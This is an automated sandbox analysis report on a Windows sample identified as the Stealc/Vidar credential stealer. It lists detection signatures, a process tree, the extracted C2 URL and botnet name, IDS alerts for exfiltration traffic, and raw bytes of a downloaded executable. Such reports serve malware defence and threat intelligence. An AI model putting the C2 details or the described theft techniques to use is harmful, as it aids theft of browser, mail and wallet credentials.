Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hwWxZRwpeL.exe

Overview

General Information

Sample name:hwWxZRwpeL.exe
renamed because original name is a hash value
Original sample name:ae721f6a78bdd19999a514e3f1ba8053.exe
Analysis ID:1544133
MD5:ae721f6a78bdd19999a514e3f1ba8053
SHA1:335a17664b77c110da2d5ff2edebb557b1fc2032
SHA256:9a55faec755f08d982ab8602bf4a6d22f78603658bd93904bfce769ddb9bf5c7
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • hwWxZRwpeL.exe (PID: 3552 cmdline: "C:\Users\user\Desktop\hwWxZRwpeL.exe" MD5: AE721F6A78BDD19999A514E3F1BA8053)
    • chrome.exe (PID: 6284 cmdline: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2636 --field-trial-handle=2296,i,13023938482430916518,14835191359952617541,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • msedge.exe (PID: 7724 cmdline: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 8056 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=2280,i,18331130875080231258,16974175982020744534,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 8936 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\ECAFHDBGHJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 9044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 3100 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • msedge.exe (PID: 8064 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6404 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7236 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7104 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 984 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7268 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7816 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7264 --field-trial-handle=2244,i,5814018708201048348,15499758968749185069,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://77.83.175.105/18a9a962225b1ffb.php", "Botnet": "LogsDiller"}

Threatname: Vidar

{"C2 url": "http://77.83.175.105/18a9a962225b1ffb.php", "Botnet": "LogsDiller"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2589210016.000000000078E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2589608743.0000000002340000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.hwWxZRwpeL.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.hwWxZRwpeL.exe.2470e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.hwWxZRwpeL.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.3.hwWxZRwpeL.exe.2550000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.hwWxZRwpeL.exe.2470e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Browser Started with Remote Debugging
                      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\hwWxZRwpeL.exe", ParentImage: C:\Users\user\Desktop\hwWxZRwpeL.exe, ParentProcessId: 3552, ParentProcessName: hwWxZRwpeL.exe, ProcessCommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 6284, ProcessName: chrome.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T22:02:01.866726+010020442451Malware Command and Control Activity Detected77.83.175.10580192.168.2.549706TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T22:02:01.859632+010020442441Malware Command and Control Activity Detected192.168.2.54970677.83.175.10580TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T22:02:02.104315+010020442461Malware Command and Control Activity Detected192.168.2.54970677.83.175.10580TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T22:02:45.996286+010020442491Malware Command and Control Activity Detected192.168.2.54987577.83.175.10580TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T22:02:02.690279+010020442481Malware Command and Control Activity Detected192.168.2.54970677.83.175.10580TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T22:02:02.113665+010020442471Malware Command and Control Activity Detected77.83.175.10580192.168.2.549706TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T22:02:01.599986+010020442431Malware Command and Control Activity Detected192.168.2.54970677.83.175.10580TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T22:02:03.155935+010028033043Unknown Traffic192.168.2.54970677.83.175.10580TCP
                      2024-10-28T22:02:28.274643+010028033043Unknown Traffic192.168.2.54979677.83.175.10580TCP
                      2024-10-28T22:02:36.389930+010028033043Unknown Traffic192.168.2.54987577.83.175.10580TCP
                      2024-10-28T22:02:39.377115+010028033043Unknown Traffic192.168.2.54987577.83.175.10580TCP
                      2024-10-28T22:02:40.916327+010028033043Unknown Traffic192.168.2.54987577.83.175.10580TCP
                      2024-10-28T22:02:43.877065+010028033043Unknown Traffic192.168.2.54987577.83.175.10580TCP
                      2024-10-28T22:02:44.415978+010028033043Unknown Traffic192.168.2.54987577.83.175.10580TCP
                      2024-10-28T22:02:48.379824+010028033043Unknown Traffic192.168.2.54993887.106.236.48443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: hwWxZRwpeL.exeAvira: detected
                      Found malware configuration
                      Source: 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://77.83.175.105/18a9a962225b1ffb.php", "Botnet": "LogsDiller"}
                      Source: 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://77.83.175.105/18a9a962225b1ffb.php", "Botnet": "LogsDiller"}
                      Multi AV Scanner detection for submitted file
                      Source: hwWxZRwpeL.exeReversingLabs: Detection: 42%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: hwWxZRwpeL.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0040A2B0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00419030
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,0_2_0040C920
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0040A210
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004072A0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C5E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C5E6C80

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeUnpacked PE file: 0.2.hwWxZRwpeL.exe.400000.1.unpack
                      Source: hwWxZRwpeL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49936 version: TLS 1.0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.5:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.5:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.106.236.48:443 -> 192.168.2.5:49938 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49974 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49973 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.159.0:443 -> 192.168.2.5:49989 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:50047 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:50099 version: TLS 1.2
                      Source: Binary string: mozglue.pdbP source: hwWxZRwpeL.exe, 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: nss3.pdb@ source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                      Source: Binary string: my_library.pdbU source: hwWxZRwpeL.exe, 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2611509049.000000006CFD1000.00000002.00000001.01000000.00000007.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
                      Source: Binary string: my_library.pdb source: hwWxZRwpeL.exe, hwWxZRwpeL.exe, 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2611509049.000000006CFD1000.00000002.00000001.01000000.00000007.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                      Source: Binary string: nss3.pdb source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                      Source: Binary string: mozglue.pdb source: hwWxZRwpeL.exe, 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: chrome.exeMemory has grown: Private usage: 1MB later: 40MB

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49706 -> 77.83.175.105:80
                      Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49706 -> 77.83.175.105:80
                      Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 77.83.175.105:80 -> 192.168.2.5:49706
                      Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49706 -> 77.83.175.105:80
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 77.83.175.105:80 -> 192.168.2.5:49706
                      Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49706 -> 77.83.175.105:80
                      Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.5:49875 -> 77.83.175.105:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: http://77.83.175.105/18a9a962225b1ffb.php
                      Source: Malware configuration extractorURLs: http://77.83.175.105/18a9a962225b1ffb.php
                      Creates HTML files with .exe extension (expired dropper behavior)
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: ECAFHDBGHJ.exe.0.dr
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 21:02:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 